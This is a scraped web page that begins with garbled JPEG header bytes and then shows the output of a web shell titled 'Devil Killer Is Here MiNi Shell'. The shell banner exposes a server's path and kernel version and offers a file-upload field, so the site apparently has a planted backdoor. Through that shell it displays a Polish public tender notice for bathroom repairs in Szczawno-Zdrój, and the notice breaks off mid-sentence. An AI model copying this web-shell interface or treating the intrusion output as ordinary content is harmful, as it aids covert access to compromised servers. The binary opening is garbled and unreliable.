JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241120/0060636701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont łazienek w Domu Zdrojowym w Szczawnie Zdrój, ul. Kolejowa 14. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Uzdrowisko Szczawno-Jedlina S.A.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000288308</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wojska Polskiego 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczawno-Zdrój</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-310</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mfajek@szczawno-jedlina.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szczawno-jedlina.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont łazienek w Domu Zdrojowym w Szczawnie Zdrój, ul. Kolejowa 14. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9a9d6687-fbff-4b7d-9cbb-fd2733ca4852</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00606367</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://szczawno-jedlina.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://szczawno-jedlina.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się za pomocą środka komunikacji elektronicznej, tj.<br/>platformy do elektronicznej obsługi zamówień publicznych Zamawiającego dostępnej pod adresem: https://szczawnojedlina.<br/>logintrade.net/rejestracja/ustawowe.html<br/>3. Oferty, oświadczenia, o których mowa w art. 125 ust. 1 p.z.p., podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa<br/>w art. 117 ust. 4 p.z.p. (oświadczenie wykonawców wspólnie ubiegających się o wykonanie zamówienia), oraz zobowiązanie<br/>podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 p.z.p., pełnomocnictwo, sporządza się w postaci elektronicznej,<br/>w formatach danych określonych w przepisach wydanych na podstawie art. 18 Ustawy z dnia 17 lutego 2005 r. o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne (Dz. U. z 2021r. poz. 2070), z zastrzeżeniem formatów, o których mowa w<br/>art. 66 ust. 1 p.z.p., z uwzględnieniem rodzaju przekazywanych danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt.<br/>4. Ofertę, a także oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, o którym mowa w<br/>Rozdziale X ust. 1 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym wyłącznie za pośrednictwem Platformy.<br/>5. Informacje, oświadczenia lub dokumenty, inne niż określone w ust. 2 powyżej przekazywane w postępowaniu, sporządza się w<br/>postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 Ustawy z dnia 17 lutego 2005<br/>r. o informatyzacji działalności podmiotów realizujących zadania publiczne lub jako tekst wpisany bezpośrednio do wiadomości<br/>przekazywanej przy użyciu środków komunikacji elektronicznej, o których mowa w § 3 ust. 1 Rozporządzenia Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020 roku w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postepowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz. U. z 2020r. poz. 2452), to jest za pośrednictwem Platformy, dostępnej pod adresem:<br/>https://gminawalbrzych.logintrade.net/rejestracja/ustawowe.html<br/>6. W przypadku gdy dokumenty elektroniczne w postępowaniu, przekazywane przy użyciu środków komunikacji elektronicznej,<br/>zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993r. o zwalczaniu<br/>nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w<br/>sposób opisany w Rozdziale XIV ust. 9 SWZ.<br/>7. Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, sporządzone w języku obcym przekazuje się wraz z<br/>tłumaczeniem na język polski.<br/>(ze względu na ograniczoną ilość znaków, ciąg dalszy w dodatkowych informacjach)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">INFORMACJA O PRZETWARZANIU DANYCH OSOBOWYCH<br/>Osób biorących udział w postępowaniu o udzielenie zamówienia publicznego<br/>w Uzdrowisku Szczawno-Jedlina S.A.<br/>1. Administratorem Pani/Pana danych osobowych jest Uzdrowisko Szczawno-Jedlina S.A. z/s ul. Wojska Polskiego 6, 58-310<br/>Szczawno-Zdrój.<br/>2. Dane osobowe przetwarzane są zgodnie z art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem<br/>o udzielenie niniejszego zamówienia publicznego<br/>3. Dane pozyskiwane są bezpośrednio od Pani/Pana wyłącznie w zakresie koniecznym przeprowadzenia postępowania.<br/>4. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Prawo Zamówień Publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Prawo Zamówień Publicznych.<br/>5. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 74 p.z.p.,<br/>6. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art.<br/>22 RODO.<br/>7. Przysługuje Pani/Panu:<br/>a. prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po<br/>stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/>publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b. żądania sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie<br/>może naruszać integralności protokołu oraz jego załączników);<br/>c. prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o<br/>udzielenie zamówienia publicznego oraz przypadków, o których mowa w art. 18 ust. 2 RODO (zgłoszenie żądania ograniczenia<br/>przetwarzania nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania; w przypadku wniesienia<br/>żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO, od dnia zakończenia postępowania o udzielenie zamówienia<br/>Zamawiający nie udostępnia danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, chyba że<br/>zachodzą przesłanki, o których mowa w art. 18 ust. 2 RODO);<br/>d. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>8. Nie przysługuje Pani/Panu:<br/>a. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c. na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>9. przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki<br/>2, 00-193 Warszawa.<br/>(ze względu na ograniczoną ilość znaków, ciąg dalszy w dodatkowych informacjach)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">INFORMACJA O PRZETWARZANIU DANYCH OSOBOWYCH<br/>Osób biorących udział w postępowaniu o udzielenie zamówienia publicznego<br/>w Uzdrowisku Szczawno-Jedlina S.A.<br/>1. Administratorem Pani/Pana danych osobowych jest Uzdrowisko Szczawno-Jedlina S.A. z/s ul. Wojska Polskiego 6, 58-310<br/>Szczawno-Zdrój.<br/>2. Dane osobowe przetwarzane są zgodnie z art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem<br/>o udzielenie niniejszego zamówienia publicznego<br/>3. Dane pozyskiwane są bezpośrednio od Pani/Pana wyłącznie w zakresie koniecznym przeprowadzenia postępowania.<br/>4. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Prawo Zamówień Publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Prawo Zamówień Publicznych.<br/>5. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 74 p.z.p.,<br/>6. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art.<br/>22 RODO.<br/>7. Przysługuje Pani/Panu:<br/>a. prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po<br/>stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/>publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b. żądania sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie<br/>może naruszać integralności protokołu oraz jego załączników);<br/>c. prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o<br/>udzielenie zamówienia publicznego oraz przypadków, o których mowa w art. 18 ust. 2 RODO (zgłoszenie żądania ograniczenia<br/>przetwarzania nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania; w przypadku wniesienia<br/>żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO, od dnia zakończenia postępowania o udzielenie zamówienia<br/>Zamawiający nie udostępnia danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, chyba że<br/>zachodzą przesłanki, o których mowa w art. 18 ust. 2 RODO);<br/>d. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>8. Nie przysługuje Pani/Panu:<br/>a. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c. na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>9. przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki<br/>2, 00-193 Warszawa.<br/>(ze względu na ograniczoną ilość znaków, ciąg dalszy w dodatkowych informacjach)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP 34/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Remont łazienek w Domu Zdrojowym w Szczawnie Zdrój, ul. Kolejowa 14. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-02-11</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">XX.	Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów i sposobu oceny ofert <br/><br/>Nr	Nazwa kryterium	Waga %	Sposób punktowania - minimalizacja<br/>1 Cena brutto	100%	Liczba punktów (C) = (cena najniższa zaproponowana w ofertach/cena badanej oferty) x 100<br/><br/>1.	Oferty będą oceniane następująco:<br/>	Kryterium 1 – najtańsza cenowo oferta uzyska 100 pkt, pozostałe proporcjonalnie mniej.<br/>1)	Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Oferty.<br/>2)	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2.	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>3.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>4.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym: Zamawiający nie wymaga przedstawienia osobnych dowodów na potwierdzenie tego warunku<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to <br/>z odrębnych przepisów: Zamawiający nie wymaga przedstawienia osobnych dowodów <br/>na potwierdzenie tego warunku<br/>3)	sytuacji ekonomicznej lub finansowej: Zamawiający nie wymaga przedstawienia osobnych dowodów na potwierdzenie tego warunku<br/>4)	zdolności technicznej lub zawodowej: <br/>a)	Zamawiający wymaga wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. <br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże (zał. nr 7 do SWZ) min:<br/>	Kierownik budowy: posiadający ważne uprawnienia do kierowania robotami w branży konstrukcyjno-budowlanej lub równoważnej bez ograniczeń oraz spełniającym wymagania z art. 37c Ustawy o ochronie zabytków i opiece nad zabytkami z dnia 23 lipca 2003 r. (Dz.U. 2003 Nr 162, poz. 1568 z późn. zm.), zgodnie z którym robotami budowlanymi przy zabytkach nieruchomych wpisanych do rejestru kieruje osoba, która posiada uprawnienia budowlane określone przepisami Prawa budowlanego oraz która przez co najmniej 18 miesięcy brała udział w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury.<br/>Zamawiający dopuszcza możliwość potwierdzenia spełniania warunku dot. dysponowania odpowiednimi osobami również poprzez wykazanie posiadania wymaganych uprawnień wydanych na podstawie wcześniej obowiązujących niż obecnie przepisów oraz odpowiadające im uprawnienia wydane Obywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym oraz innych przepisów ustawy Prawo Budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	Zamawiający wymaga wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. <br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże (zał. nr 7 do SWZ) min:<br/>	Kierownik budowy: posiadający ważne uprawnienia do kierowania robotami w branży konstrukcyjno-budowlanej lub równoważnej bez ograniczeń oraz spełniającym wymagania z art. 37c Ustawy o ochronie zabytków i opiece nad zabytkami z dnia 23 lipca 2003 r. (Dz.U. 2003 Nr 162, poz. 1568 z późn. zm.), zgodnie z którym robotami budowlanymi przy zabytkach nieruchomych wpisanych do rejestru kieruje osoba, która posiada uprawnienia budowlane określone przepisami Prawa budowlanego oraz która przez co najmniej 18 miesięcy brała udział w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury.<br/>Zamawiający dopuszcza możliwość potwierdzenia spełniania warunku dot. dysponowania odpowiednimi osobami również poprzez wykazanie posiadania wymaganych uprawnień wydanych na podstawie wcześniej obowiązujących niż obecnie przepisów oraz odpowiadające im uprawnienia wydane Obywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym oraz innych przepisów ustawy Prawo Budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii 